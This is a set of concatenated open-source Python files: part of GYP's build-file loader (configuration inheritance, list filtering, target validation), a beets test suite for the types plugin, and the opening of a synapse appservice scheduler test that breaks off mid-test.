          # If the key ends in "?", the list will only be merged if it doesn't
          # already exist.
          continue
        if not isinstance(to[list_base], list):
          # This may not have been checked above if merging in a list with an
          # extension character.
          raise TypeError, \
              'Attempt to merge dict value of type ' + v.__class__.__name__ + \
              ' into incompatible type ' + to[list_base].__class__.__name__ + \
              ' for key ' + list_base + '(' + k + ')'
      else:
        to[list_base] = []
      # Call MergeLists, which will make copies of objects that require it.
      # MergeLists can recurse back into MergeDicts, although this will be
      # to make copies of dicts (with paths fixed), there will be no
      # subsequent dict "merging" once entering a list because lists are
      # always replaced, appended to, or prepended to.
      is_paths = IsPathSection(list_base)
      MergeLists(to[list_base], v, to_file, fro_file, is_paths, append)
    else:
      raise TypeError, \
          'Attempt to merge dict value of unsupported type ' + \
          v.__class__.__name__ + ' for key ' + k
def MergeConfigWithInheritance(new_configuration_dict, build_file,
                               target_dict, configuration, visited):
  """Recursively folds |configuration| into |new_configuration_dict|.

  Ancestors named in 'inherit_from' are merged depth-first before the
  configuration itself, so a child's settings take precedence over its
  parents'.  |visited| lists configurations already on the inheritance path
  and guards against cycles and duplicate merges.
  """
  # Already merged along this inheritance path: nothing to do.
  if configuration in visited:
    return
  config = target_dict['configurations'][configuration]
  # Parents first, so that this configuration's own values win on conflict.
  for parent in config.get('inherit_from', []):
    MergeConfigWithInheritance(new_configuration_dict, build_file,
                               target_dict, parent, visited + [configuration])
  MergeDicts(new_configuration_dict, config, build_file, build_file)
  # A fully merged configuration is concrete; the 'abstract' marker that may
  # have been inherited no longer applies.
  new_configuration_dict.pop('abstract', None)
def SetUpConfigurations(target, target_dict):
  """Builds full per-configuration dicts for |target|, in place.

  Each concrete configuration inherits (most of) the enclosing target's
  settings plus its 'inherit_from' ancestors, abstract configurations are
  dropped, and keys that were moved into configurations are removed from the
  target's top level.  A 'Default' configuration and a
  'default_configuration' are supplied when absent.

  Raises:
    GypError: if a configuration contains a key from
        invalid_configuration_keys.
  """
  # key_suffixes is a list of key suffixes that might appear on key names.
  # These suffixes are handled in conditional evaluations (for =, +, and ?)
  # and rules/exclude processing (for ! and /). Keys with these suffixes
  # should be treated the same as keys without.
  key_suffixes = ['=', '+', '?', '!', '/']
  build_file = gyp.common.BuildFile(target)
  # Provide a single configuration by default if none exists.
  # TODO(mark): Signal an error if default_configurations exists but
  # configurations does not.
  if not 'configurations' in target_dict:
    target_dict['configurations'] = {'Default': {}}
  if not 'default_configuration' in target_dict:
    # First concrete configuration in sorted order becomes the default.
    concrete = [i for i in target_dict['configurations'].iterkeys()
                if not target_dict['configurations'][i].get('abstract')]
    target_dict['default_configuration'] = sorted(concrete)[0]
  # .keys() snapshot: entries are replaced while iterating.
  for configuration in target_dict['configurations'].keys():
    old_configuration_dict = target_dict['configurations'][configuration]
    # Skip abstract configurations (saves work only).
    if old_configuration_dict.get('abstract'):
      continue
    # Configurations inherit (most) settings from the enclosing target scope.
    # Get the inheritance relationship right by making a copy of the target
    # dict.
    new_configuration_dict = copy.deepcopy(target_dict)
    # Take out the bits that don't belong in a "configurations" section.
    # Since configuration setup is done before conditional, exclude, and rules
    # processing, be careful with handling of the suffix characters used in
    # those phases.
    delete_keys = []
    for key in new_configuration_dict:
      key_ext = key[-1:]
      if key_ext in key_suffixes:
        key_base = key[:-1]
      else:
        key_base = key
      if key_base in non_configuration_keys:
        delete_keys.append(key)
    for key in delete_keys:
      del new_configuration_dict[key]
    # Merge in configuration (with all its parents first).
    MergeConfigWithInheritance(new_configuration_dict, build_file,
                               target_dict, configuration, [])
    # Put the new result back into the target dict as a configuration.
    target_dict['configurations'][configuration] = new_configuration_dict
  # Now drop all the abstract ones.
  for configuration in target_dict['configurations'].keys():
    old_configuration_dict = target_dict['configurations'][configuration]
    if old_configuration_dict.get('abstract'):
      del target_dict['configurations'][configuration]
  # Now that all of the target's configurations have been built, go through
  # the target dict's keys and remove everything that's been moved into a
  # "configurations" section.
  delete_keys = []
  for key in target_dict:
    key_ext = key[-1:]
    if key_ext in key_suffixes:
      key_base = key[:-1]
    else:
      key_base = key
    if not key_base in non_configuration_keys:
      delete_keys.append(key)
  for key in delete_keys:
    del target_dict[key]
  # Check the configurations to see if they contain invalid keys.
  for configuration in target_dict['configurations'].keys():
    configuration_dict = target_dict['configurations'][configuration]
    for key in configuration_dict.keys():
      if key in invalid_configuration_keys:
        raise GypError('%s not allowed in the %s configuration, found in '
                       'target %s' % (key, configuration, target))
def ProcessListFiltersInDict(name, the_dict):
  """Process regular expression and exclusion-based filters on lists.

  An exclusion list is in a dict key named with a trailing "!", like
  "sources!". Every item in such a list is removed from the associated
  main list, which in this example, would be "sources". Removed items are
  placed into a "sources_excluded" list in the dict.

  Regular expression (regex) filters are contained in dict keys named with a
  trailing "/", such as "sources/" to operate on the "sources" list. Regex
  filters in a dict take the form:
    'sources/': [ ['exclude', '_(linux|mac|win)\\.cc$'],
                  ['include', '_mac\\.cc$'] ],
  The first filter says to exclude all files ending in _linux.cc, _mac.cc, and
  _win.cc. The second filter then includes all files ending in _mac.cc that
  are now or were once in the "sources" list. Items matching an "exclude"
  filter are subject to the same processing as would occur if they were listed
  by name in an exclusion list (ending in "!"). Items matching an "include"
  filter are brought back into the main list if previously excluded by an
  exclusion list or exclusion regex filter. Subsequent matching "exclude"
  patterns can still cause items to be excluded after matching an "include".
  """
  # Look through the dictionary for any lists whose keys end in "!" or "/".
  # These are lists that will be treated as exclude lists and regular
  # expression-based exclude/include lists. Collect the lists that are
  # needed first, looking for the lists that they operate on, and assemble
  # then into |lists|. This is done in a separate loop up front, because
  # the _included and _excluded keys need to be added to the_dict, and that
  # can't be done while iterating through it.
  lists = []
  del_lists = []
  for key, value in the_dict.iteritems():
    operation = key[-1]
    if operation != '!' and operation != '/':
      continue
    if not isinstance(value, list):
      raise ValueError, name + ' key ' + key + ' must be list, not ' + \
                        value.__class__.__name__
    list_key = key[:-1]
    if list_key not in the_dict:
      # This happens when there's a list like "sources!" but no corresponding
      # "sources" list. Since there's nothing for it to operate on, queue up
      # the "sources!" list for deletion now.
      del_lists.append(key)
      continue
    if not isinstance(the_dict[list_key], list):
      value = the_dict[list_key]
      raise ValueError, name + ' key ' + list_key + \
                        ' must be list, not ' + \
                        value.__class__.__name__ + ' when applying ' + \
                        {'!': 'exclusion', '/': 'regex'}[operation]
    if not list_key in lists:
      lists.append(list_key)
  # Delete the lists that are known to be unneeded at this point.
  for del_list in del_lists:
    del the_dict[del_list]
  for list_key in lists:
    the_list = the_dict[list_key]
    # Initialize the list_actions list, which is parallel to the_list. Each
    # item in list_actions identifies whether the corresponding item in
    # the_list should be excluded, unconditionally preserved (included), or
    # whether no exclusion or inclusion has been applied. Items for which
    # no exclusion or inclusion has been applied (yet) have value -1, items
    # excluded have value 0, and items included have value 1. Includes and
    # excludes override previous actions. All items in list_actions are
    # initialized to -1 because no excludes or includes have been processed
    # yet.
    list_actions = list((-1,) * len(the_list))
    exclude_key = list_key + '!'
    if exclude_key in the_dict:
      for exclude_item in the_dict[exclude_key]:
        for index in xrange(0, len(the_list)):
          if exclude_item == the_list[index]:
            # This item matches the exclude_item, so set its action to 0
            # (exclude).
            list_actions[index] = 0
      # The "whatever!" list is no longer needed, dump it.
      del the_dict[exclude_key]
    regex_key = list_key + '/'
    if regex_key in the_dict:
      for regex_item in the_dict[regex_key]:
        [action, pattern] = regex_item
        pattern_re = re.compile(pattern)
        if action == 'exclude':
          # This item matches an exclude regex, so set its value to 0 (exclude).
          action_value = 0
        elif action == 'include':
          # This item matches an include regex, so set its value to 1 (include).
          action_value = 1
        else:
          # This is an action that doesn't make any sense.
          raise ValueError, 'Unrecognized action ' + action + ' in ' + name + \
                            ' key ' + regex_key
        for index in xrange(0, len(the_list)):
          list_item = the_list[index]
          if list_actions[index] == action_value:
            # Even if the regex matches, nothing will change so continue (regex
            # searches are expensive).
            continue
          if pattern_re.search(list_item):
            # Regular expression match.
            list_actions[index] = action_value
      # The "whatever/" list is no longer needed, dump it.
      del the_dict[regex_key]
    # Add excluded items to the excluded list.
    #
    # Note that exclude_key ("sources!") is different from excluded_key
    # ("sources_excluded"). The exclude_key list is input and it was already
    # processed and deleted; the excluded_key list is output and it's about
    # to be created.
    excluded_key = list_key + '_excluded'
    if excluded_key in the_dict:
      raise GypError(name + ' key ' + excluded_key +
                     ' must not be present prior '
                     ' to applying exclusion/regex filters for ' + list_key)
    excluded_list = []
    # Go backwards through the list_actions list so that as items are deleted,
    # the indices of items that haven't been seen yet don't shift. That means
    # that things need to be prepended to excluded_list to maintain them in the
    # same order that they existed in the_list.
    for index in xrange(len(list_actions) - 1, -1, -1):
      if list_actions[index] == 0:
        # Dump anything with action 0 (exclude). Keep anything with action 1
        # (include) or -1 (no include or exclude seen for the item).
        excluded_list.insert(0, the_list[index])
        del the_list[index]
    # If anything was excluded, put the excluded list into the_dict at
    # excluded_key.
    if len(excluded_list) > 0:
      the_dict[excluded_key] = excluded_list
  # Now recurse into subdicts and lists that may contain dicts.
  for key, value in the_dict.iteritems():
    if isinstance(value, dict):
      ProcessListFiltersInDict(key, value)
    elif isinstance(value, list):
      ProcessListFiltersInList(key, value)
def ProcessListFiltersInList(name, the_list):
  """Recursively applies ProcessListFiltersInDict to every dict nested
  anywhere inside |the_list|, reporting filters under |name|."""
  for element in the_list:
    if isinstance(element, dict):
      ProcessListFiltersInDict(name, element)
    elif isinstance(element, list):
      ProcessListFiltersInList(name, element)
def ValidateTargetType(target, target_dict):
  """Ensures the 'type' field on the target is one of the known types.

  Arguments:
    target: string, name of target.
    target_dict: dict, target spec.

  Raises:
    GypError: on an unknown type, or when 'standalone_static_library' is set
        on a non-static_library target.
  """
  valid_types = ('executable', 'loadable_module', 'static_library',
                 'shared_library', 'none')
  declared_type = target_dict.get('type', None)
  if declared_type not in valid_types:
    raise GypError("Target %s has an invalid target type '%s'. "
                   "Must be one of %s." %
                   (target, declared_type, '/'.join(valid_types)))
  # The standalone flag only makes sense on static libraries.
  if (target_dict.get('standalone_static_library', 0) and
      declared_type != 'static_library'):
    raise GypError('Target %s has type %s but standalone_static_library flag is'
                   ' only valid for static_library type.' % (target,
                                                             declared_type))
def ValidateSourcesInTarget(target, target_dict, build_file):
  """Rejects libraries whose compiled sources share a basename.

  Some build systems (e.g. MSVC08) place all object files for a target in
  one directory, so two sources with the same basename clobber each other.

  Raises:
    GypError: when duplicates are found (after printing the offenders).
  """
  # Only libraries are affected; other target types pass through.
  # TODO: Check if MSVC allows this for loadable_module targets.
  if target_dict.get('type', None) not in ('static_library', 'shared_library'):
    return
  compiled_exts = ['.c', '.cc', '.cpp', '.cxx', '.m', '.mm', '.s', '.S']
  by_basename = {}
  for source in target_dict.get('sources', []):
    stem, ext = os.path.splitext(source)
    # Headers and other non-compiled files can't collide; skip them.
    if ext not in compiled_exts:
      continue
    by_basename.setdefault(os.path.basename(stem), []).append(source)
  error = ''
  for basename, files in by_basename.iteritems():
    if len(files) > 1:
      error += '  %s: %s\n' % (basename, ' '.join(files))
  if error:
    print('static library %s has several files with the same basename:\n' %
          target + error + 'Some build systems, e.g. MSVC08, '
          'cannot handle that.')
    raise GypError('Duplicate basenames in sources section, see list above')
def ValidateRulesInTarget(target, target_dict, extra_sources_for_rules):
  """Ensures that the rules sections in target_dict are valid and consistent,
  and determines which sources they apply to.

  Arguments:
    target: string, name of target.
    target_dict: dict, target spec containing "rules" and "sources" lists.
    extra_sources_for_rules: a list of keys to scan for rule matches in
        addition to 'sources'.

  Raises:
    GypError: on duplicate rule names, duplicate extensions, or a
        pre-existing 'rule_sources' key.
  """
  # Track rule names and extensions seen so far to detect conflicts.
  rule_names = {}
  rule_extensions = {}
  for rule in target_dict.get('rules', []):
    rule_name = rule['rule_name']
    if rule_name in rule_names:
      raise GypError('rule %s exists in duplicate, target %s' %
                     (rule_name, target))
    rule_names[rule_name] = rule
    # Normalize '.ext' to 'ext' before checking for extension collisions.
    rule_extension = rule['extension']
    if rule_extension.startswith('.'):
      rule_extension = rule_extension[1:]
    if rule_extension in rule_extensions:
      raise GypError(('extension %s associated with multiple rules, ' +
                      'target %s rules %s and %s') %
                     (rule_extension, target,
                      rule_extensions[rule_extension]['rule_name'],
                      rule_name))
    rule_extensions[rule_extension] = rule
    # 'rule_sources' is an output of this function; refuse it as input.
    if 'rule_sources' in rule:
      raise GypError(
          'rule_sources must not exist in input, target %s rule %s' %
          (target, rule_name))
    # Collect every source (from 'sources' and any extra keys) whose
    # extension matches this rule.
    matching_sources = []
    for source_key in ['sources'] + extra_sources_for_rules:
      for source in target_dict.get(source_key, []):
        source_extension = os.path.splitext(source)[1]
        if source_extension.startswith('.'):
          source_extension = source_extension[1:]
        if source_extension == rule_extension:
          matching_sources.append(source)
    if len(matching_sources) > 0:
      rule['rule_sources'] = matching_sources
def ValidateRunAsInTarget(target, target_dict, build_file):
  """Checks that an optional 'run_as' section is well-formed.

  A 'run_as' must be a dict with a list-valued 'action', an optional string
  'working_directory', and an optional dict 'environment'.

  Raises:
    GypError: describing the first malformed field found.
  """
  target_name = target_dict.get('target_name')
  run_as = target_dict.get('run_as')
  # 'run_as' is entirely optional.
  if not run_as:
    return
  if not isinstance(run_as, dict):
    raise GypError("The 'run_as' in target %s from file %s should be a "
                   "dictionary." %
                   (target_name, build_file))
  command = run_as.get('action')
  if not command:
    raise GypError("The 'run_as' in target %s from file %s must have an "
                   "'action' section." %
                   (target_name, build_file))
  if not isinstance(command, list):
    raise GypError("The 'action' for 'run_as' in target %s from file %s "
                   "must be a list." %
                   (target_name, build_file))
  workdir = run_as.get('working_directory')
  if workdir and not isinstance(workdir, str):
    raise GypError("The 'working_directory' for 'run_as' in target %s "
                   "in file %s should be a string." %
                   (target_name, build_file))
  env = run_as.get('environment')
  if env and not isinstance(env, dict):
    raise GypError("The 'environment' for 'run_as' in target %s "
                   "in file %s should be a dictionary." %
                   (target_name, build_file))
def ValidateActionsInTarget(target, target_dict, build_file):
  """Validates the inputs to the actions in a target.

  Each action must carry an 'action_name', an 'inputs' key (possibly an
  empty list), and — if an 'action' command is present — a non-empty first
  element.

  Raises:
    GypError: describing the first malformed action found.
  """
  target_name = target_dict.get('target_name')
  for spec in target_dict.get('actions', []):
    # Every action needs a name for diagnostics and build-file output.
    if not spec.get('action_name'):
      raise GypError("Anonymous action in target %s. "
                     "An action must have an 'action_name' field." %
                     target_name)
    # 'inputs' must be present even when empty; its absence is an error.
    if spec.get('inputs', None) is None:
      raise GypError('Action in target %s has no inputs.' % target_name)
    command = spec.get('action')
    if command and not command[0]:
      raise GypError("Empty action as command in target %s." % target_name)
def TurnIntIntoStrInDict(the_dict):
"""Given dict the_dict, recursively converts all integers into strings.
"""
# Use items instead of iteritems because there's no need to try to look at
# reinserted keys and their associated values.
for k, v in the_dict.items():
if isinstance(v, int):
v = str(v)
the_dict[k] = v
elif isinstance(v, dict):
TurnIntIntoStrInDict(v)
elif isinstance(v, list):
TurnIntIntoStrInList(v)
if isinstance(k, int):
the_dict[str(k)] = v
del the_dict[k]
def TurnIntIntoStrInList(the_list):
"""Given list the_list, recursively converts all integers into strings.
"""
for index in xrange(0, len(the_list)):
item = the_list[index]
if isinstance(item, int):
the_list[index] = str(item)
elif isinstance(item, dict):
TurnIntIntoStrInDict(item)
elif isinstance(item, list):
TurnIntIntoStrInList(item)
def PruneUnwantedTargets(targets, flat_list, dependency_nodes, root_targets,
                         data):
  """Return only the targets that are deep dependencies of |root_targets|."""
  # Resolve each requested root name to its fully-qualified target name(s).
  roots = []
  for requested in root_targets:
    requested = requested.strip()
    matches = gyp.common.FindQualifiedTargets(requested, flat_list)
    if not matches:
      raise GypError("Could not find target %s" % requested)
    roots.extend(matches)
  # Keep the roots themselves plus everything they transitively depend on.
  wanted_targets = {}
  for root in roots:
    wanted_targets[root] = targets[root]
    for dep in dependency_nodes[root].DeepDependencies():
      wanted_targets[dep] = targets[dep]
  wanted_flat_list = [t for t in flat_list if t in wanted_targets]
  # Drop pruned targets from each build file's 'targets' list in |data| too.
  for build_file in data['target_build_files']:
    if not 'targets' in data[build_file]:
      continue
    data[build_file]['targets'] = [
        t for t in data[build_file]['targets']
        if gyp.common.QualifiedTarget(
            build_file, t['target_name'], t['toolset']) in wanted_targets]
  return wanted_targets, wanted_flat_list
def VerifyNoCollidingTargets(targets):
  """Verify that no two targets in the same directory share the same name.

  Arguments:
    targets: A list of targets in the form 'path/to/file.gyp:target_name'.

  Raises:
    GypError: naming both .gyp files involved in the first collision found.
  """
  # Maps 'subdirectory:target_name' to the .gyp file that first claimed it.
  used = {}
  for target in targets:
    # 'path/to/file.gyp:target_name' -> ('path/to/file.gyp', 'target_name').
    path, name = target.rsplit(':', 1)
    # 'path/to/file.gyp' -> ('path/to', 'file.gyp').
    subdir, gyp = os.path.split(path)
    # Use '.' for the current directory '' so the error message reads well.
    if not subdir:
      subdir = '.'
    # Collision key: directory plus target name, independent of .gyp file.
    key = subdir + ':' + name
    if key in used:
      raise GypError('Duplicate target name "%s" in directory "%s" used both '
                     'in "%s" and "%s".' % (name, subdir, gyp, used[key]))
    used[key] = gyp
def SetGeneratorGlobals(generator_input_info):
  """Seeds this module's generator-dependent globals from
  |generator_input_info|: the base path/non-configuration key lists plus the
  generator-specific additions, and the toolset/filelist settings."""
  global path_sections, non_configuration_keys
  global multiple_toolsets, generator_filelist_paths
  # Fresh lists each call: defaults first, then the generator's additions.
  path_sections = (base_path_sections +
                   generator_input_info['path_sections'])
  non_configuration_keys = (base_non_configuration_keys +
                            generator_input_info['non_configuration_keys'])
  multiple_toolsets = generator_input_info[
      'generator_supports_multiple_toolsets']
  generator_filelist_paths = generator_input_info['generator_filelist_paths']
def Load(build_files, variables, includes, depth, generator_input_info, check,
         circular_check, parallel, root_targets):
  """Loads, merges, and validates every build file reachable from
  |build_files|, returning [flat_list, targets, data].

  flat_list is a dependency-ordered list of qualified target names, targets
  maps those names to fully-processed target dicts, and data maps build file
  names to their processed contents (plus a 'target_build_files' key set).
  """
  SetGeneratorGlobals(generator_input_info)
  # A generator can have other lists (in addition to sources) be processed
  # for rules.
  extra_sources_for_rules = generator_input_info['extra_sources_for_rules']
  # Load build files. This loads every target-containing build file into
  # the |data| dictionary such that the keys to |data| are build file names,
  # and the values are the entire build file contents after "early" or "pre"
  # processing has been done and includes have been resolved.
  # NOTE: data contains both "target" files (.gyp) and "includes" (.gypi), as
  # well as meta-data (e.g. 'included_files' key). 'target_build_files' keeps
  # track of the keys corresponding to "target" files.
  data = {'target_build_files': set()}
  aux_data = {}
  # Normalize paths everywhere. This is important because paths will be
  # used as keys to the data dict and for references between input files.
  build_files = set(map(os.path.normpath, build_files))
  if parallel:
    LoadTargetBuildFilesParallel(build_files, data, aux_data,
                                 variables, includes, depth, check,
                                 generator_input_info)
  else:
    for build_file in build_files:
      try:
        LoadTargetBuildFile(build_file, data, aux_data,
                            variables, includes, depth, check, True)
      except Exception, e:
        gyp.common.ExceptionAppend(e, 'while trying to load %s' % build_file)
        raise
  # Build a dict to access each target's subdict by qualified name.
  targets = BuildTargetsDict(data)
  # Fully qualify all dependency links.
  QualifyDependencies(targets)
  # Remove self-dependencies from targets that have 'prune_self_dependencies'
  # set to 1.
  RemoveSelfDependencies(targets)
  # Expand dependencies specified as build_file:*.
  ExpandWildcardDependencies(targets, data)
  # Apply exclude (!) and regex (/) list filters only for dependency_sections.
  for target_name, target_dict in targets.iteritems():
    # Filter dependency sections in isolation so other sections are untouched
    # at this early phase.
    tmp_dict = {}
    for key_base in dependency_sections:
      for op in ('', '!', '/'):
        key = key_base + op
        if key in target_dict:
          tmp_dict[key] = target_dict[key]
          del target_dict[key]
    ProcessListFiltersInDict(target_name, tmp_dict)
    # Write the results back to |target_dict|.
    for key in tmp_dict:
      target_dict[key] = tmp_dict[key]
  # Make sure every dependency appears at most once.
  RemoveDuplicateDependencies(targets)
  if circular_check:
    # Make sure that any targets in a.gyp don't contain dependencies in other
    # .gyp files that further depend on a.gyp.
    VerifyNoGYPFileCircularDependencies(targets)
  [dependency_nodes, flat_list] = BuildDependencyList(targets)
  if root_targets:
    # Remove, from |targets| and |flat_list|, the targets that are not deep
    # dependencies of the targets specified in |root_targets|.
    targets, flat_list = PruneUnwantedTargets(
        targets, flat_list, dependency_nodes, root_targets, data)
  # Check that no two targets in the same directory have the same name.
  VerifyNoCollidingTargets(flat_list)
  # Handle dependent settings of various types.
  for settings_type in ['all_dependent_settings',
                        'direct_dependent_settings',
                        'link_settings']:
    DoDependentSettings(settings_type, flat_list, targets, dependency_nodes)
    # Take out the dependent settings now that they've been published to all
    # of the targets that require them.
    for target in flat_list:
      if settings_type in targets[target]:
        del targets[target][settings_type]
  # Make sure static libraries don't declare dependencies on other static
  # libraries, but that linkables depend on all unlinked static libraries
  # that they need so that their link steps will be correct.
  gii = generator_input_info
  if gii['generator_wants_static_library_dependencies_adjusted']:
    AdjustStaticLibraryDependencies(flat_list, targets, dependency_nodes,
                                    gii['generator_wants_sorted_dependencies'])
  # Apply "post"/"late"/"target" variable expansions and condition evaluations.
  for target in flat_list:
    target_dict = targets[target]
    build_file = gyp.common.BuildFile(target)
    ProcessVariablesAndConditionsInDict(
        target_dict, PHASE_LATE, variables, build_file)
  # Move everything that can go into a "configurations" section into one.
  for target in flat_list:
    target_dict = targets[target]
    SetUpConfigurations(target, target_dict)
  # Apply exclude (!) and regex (/) list filters.
  for target in flat_list:
    target_dict = targets[target]
    ProcessListFiltersInDict(target, target_dict)
  # Apply "latelate" variable expansions and condition evaluations.
  for target in flat_list:
    target_dict = targets[target]
    build_file = gyp.common.BuildFile(target)
    ProcessVariablesAndConditionsInDict(
        target_dict, PHASE_LATELATE, variables, build_file)
  # Make sure that the rules make sense, and build up rule_sources lists as
  # needed. Not all generators will need to use the rule_sources lists, but
  # some may, and it seems best to build the list in a common spot.
  # Also validate actions and run_as elements in targets.
  for target in flat_list:
    target_dict = targets[target]
    build_file = gyp.common.BuildFile(target)
    ValidateTargetType(target, target_dict)
    # TODO(thakis): Get vpx_scale/arm/scalesystemdependent.c to be renamed to
    # scalesystemdependent_arm_additions.c or similar.
    if 'arm' not in variables.get('target_arch', ''):
      ValidateSourcesInTarget(target, target_dict, build_file)
    ValidateRulesInTarget(target, target_dict, extra_sources_for_rules)
    ValidateRunAsInTarget(target, target_dict, build_file)
    ValidateActionsInTarget(target, target_dict, build_file)
  # Generators might not expect ints. Turn them into strs.
  TurnIntIntoStrInDict(data)
  # TODO(mark): Return |data| for now because the generator needs a list of
  # build files that came in. In the future, maybe it should just accept
  # a list, and not the whole data dict.
  return [flat_list, targets, data]
| mit |
ruippeixotog/beets | test/test_types_plugin.py | 25 | 4986 | # This file is part of beets.
# Copyright 2015, Thomas Scholtes.
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
from __future__ import (division, absolute_import, print_function,
unicode_literals)
import time
from datetime import datetime
from test._common import unittest
from test.helper import TestHelper
from beets.util.confit import ConfigValueError
class TypesPluginTest(unittest.TestCase, TestHelper):
    def setUp(self):
        # Fresh beets library/config sandbox with the 'types' plugin loaded
        # for every test.
        self.setup_beets()
        self.load_plugins('types')
    def tearDown(self):
        # Mirror setUp in reverse: unload the plugin, then tear down the
        # sandbox.
        self.unload_plugins()
        self.teardown_beets()
def test_integer_modify_and_query(self):
self.config['types'] = {'myint': 'int'}
item = self.add_item(artist='aaa')
# Do not match unset values
out = self.list('myint:1..3')
self.assertEqual('', out)
self.modify('myint=2')
item.load()
self.assertEqual(item['myint'], 2)
# Match in range
out = self.list('myint:1..3')
self.assertIn(b'aaa', out)
def test_album_integer_modify_and_query(self):
self.config['types'] = {'myint': 'int'}
album = self.add_album(albumartist='aaa')
# Do not match unset values
out = self.list_album('myint:1..3')
self.assertEqual('', out)
self.modify('-a', 'myint=2')
album.load()
self.assertEqual(album['myint'], 2)
# Match in range
out = self.list_album('myint:1..3')
self.assertIn(b'aaa', out)
def test_float_modify_and_query(self):
self.config['types'] = {'myfloat': 'float'}
item = self.add_item(artist='aaa')
self.modify('myfloat=-9.1')
item.load()
self.assertEqual(item['myfloat'], -9.1)
# Match in range
out = self.list('myfloat:-10..0')
self.assertIn(b'aaa', out)
def test_bool_modify_and_query(self):
self.config['types'] = {'mybool': 'bool'}
true = self.add_item(artist='true')
false = self.add_item(artist='false')
self.add_item(artist='unset')
# Set true
self.modify('mybool=1', 'artist:true')
true.load()
self.assertEqual(true['mybool'], True)
# Set false
self.modify('mybool=false', 'artist:false')
false.load()
self.assertEqual(false['mybool'], False)
# Query bools
out = self.list('mybool:true', '$artist $mybool')
self.assertEqual('true True', out)
out = self.list('mybool:false', '$artist $mybool')
# Dealing with unset fields?
# self.assertEqual('false False', out)
# out = self.list('mybool:', '$artist $mybool')
# self.assertIn('unset $mybool', out)
def test_date_modify_and_query(self):
self.config['types'] = {'mydate': 'date'}
# FIXME parsing should also work with default time format
self.config['time_format'] = '%Y-%m-%d'
old = self.add_item(artist='prince')
new = self.add_item(artist='britney')
self.modify('mydate=1999-01-01', 'artist:prince')
old.load()
self.assertEqual(old['mydate'], mktime(1999, 01, 01))
self.modify('mydate=1999-12-30', 'artist:britney')
new.load()
self.assertEqual(new['mydate'], mktime(1999, 12, 30))
# Match in range
out = self.list('mydate:..1999-07', '$artist $mydate')
self.assertEqual('prince 1999-01-01', out)
# FIXME some sort of timezone issue here
# out = self.list('mydate:1999-12-30', '$artist $mydate')
# self.assertEqual('britney 1999-12-30', out)
def test_unknown_type_error(self):
self.config['types'] = {'flex': 'unkown type'}
with self.assertRaises(ConfigValueError):
self.run_command('ls')
def modify(self, *args):
return self.run_with_output('modify', '--yes', '--nowrite',
'--nomove', *args)
def list(self, query, fmt='$artist - $album - $title'):
return self.run_with_output('ls', '-f', fmt, query).strip()
def list_album(self, query, fmt='$albumartist - $album - $title'):
return self.run_with_output('ls', '-a', '-f', fmt, query).strip()
def mktime(*args):
    """Build a local-time POSIX timestamp from date/time components.

    Accepts the same positional arguments as ``datetime.datetime``.
    """
    moment = datetime(*args)
    return time.mktime(moment.timetuple())
def suite():
    """Collect this module's test cases into a suite for the runner."""
    loader = unittest.TestLoader()
    return loader.loadTestsFromName(__name__)
if __name__ == '__main__':
    # Use a native-str literal: the original compared against b'__main__',
    # which can never equal __name__ on Python 3 and silently disabled
    # direct execution there.  A plain literal works on Python 2 as well.
    unittest.main(defaultTest='suite')
| mit |
iot-factory/synapse | tests/appservice/test_scheduler.py | 4 | 9973 | # -*- coding: utf-8 -*-
# Copyright 2015 OpenMarket Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from synapse.appservice import ApplicationServiceState, AppServiceTransaction
from synapse.appservice.scheduler import (
_ServiceQueuer, _TransactionController, _Recoverer
)
from twisted.internet import defer
from ..utils import MockClock
from mock import Mock
from tests import unittest
class ApplicationServiceSchedulerTransactionCtrlTestCase(unittest.TestCase):
    """Tests for _TransactionController: a transaction is always created
    and stored; whether it is actually sent (and what happens when a send
    fails) depends on the recorded ApplicationServiceState."""
    def setUp(self):
        self.clock = MockClock()
        self.store = Mock()
        self.as_api = Mock()
        self.recoverer = Mock()
        # recoverer_fn is the factory the controller uses to build a
        # _Recoverer when a send fails; here it yields our mock recoverer.
        self.recoverer_fn = Mock(return_value=self.recoverer)
        self.txnctrl = _TransactionController(
            clock=self.clock, store=self.store, as_api=self.as_api,
            recoverer_fn=self.recoverer_fn
        )
    def test_single_service_up_txn_sent(self):
        # Test: The AS is up and the txn is successfully sent.
        service = Mock()
        events = [Mock(), Mock()]
        txn_id = "foobar"
        txn = Mock(id=txn_id, service=service, events=events)
        # mock methods
        self.store.get_appservice_state = Mock(
            return_value=defer.succeed(ApplicationServiceState.UP)
        )
        txn.send = Mock(return_value=defer.succeed(True))
        self.store.create_appservice_txn = Mock(
            return_value=defer.succeed(txn)
        )
        # actual call
        self.txnctrl.send(service, events)
        self.store.create_appservice_txn.assert_called_once_with(
            service=service, events=events # txn made and saved
        )
        self.assertEquals(0, len(self.txnctrl.recoverers)) # no recoverer made
        txn.complete.assert_called_once_with(self.store) # txn completed
    def test_single_service_down(self):
        # Test: The AS is down so it shouldn't push; Recoverers will do it.
        # It should still make a transaction though.
        service = Mock()
        events = [Mock(), Mock()]
        txn = Mock(id="idhere", service=service, events=events)
        self.store.get_appservice_state = Mock(
            return_value=defer.succeed(ApplicationServiceState.DOWN)
        )
        self.store.create_appservice_txn = Mock(
            return_value=defer.succeed(txn)
        )
        # actual call
        self.txnctrl.send(service, events)
        self.store.create_appservice_txn.assert_called_once_with(
            service=service, events=events # txn made and saved
        )
        self.assertEquals(0, txn.send.call_count) # txn not sent though
        self.assertEquals(0, txn.complete.call_count) # or completed
    def test_single_service_up_txn_not_sent(self):
        # Test: The AS is up and the txn is not sent. A Recoverer is made and
        # started.
        service = Mock()
        events = [Mock(), Mock()]
        txn_id = "foobar"
        txn = Mock(id=txn_id, service=service, events=events)
        # mock methods
        self.store.get_appservice_state = Mock(
            return_value=defer.succeed(ApplicationServiceState.UP)
        )
        self.store.set_appservice_state = Mock(return_value=defer.succeed(True))
